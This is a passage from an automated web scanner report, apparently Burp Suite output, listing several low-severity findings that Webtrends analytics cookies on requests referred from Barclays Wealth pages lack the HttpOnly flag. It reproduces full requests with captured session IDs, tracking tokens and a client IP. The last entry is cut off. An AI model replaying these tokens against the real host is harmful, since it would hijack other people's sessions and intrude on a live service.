0f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.46. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=461B874546EDC251C6A7440F7F10048D; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.47. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.48. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc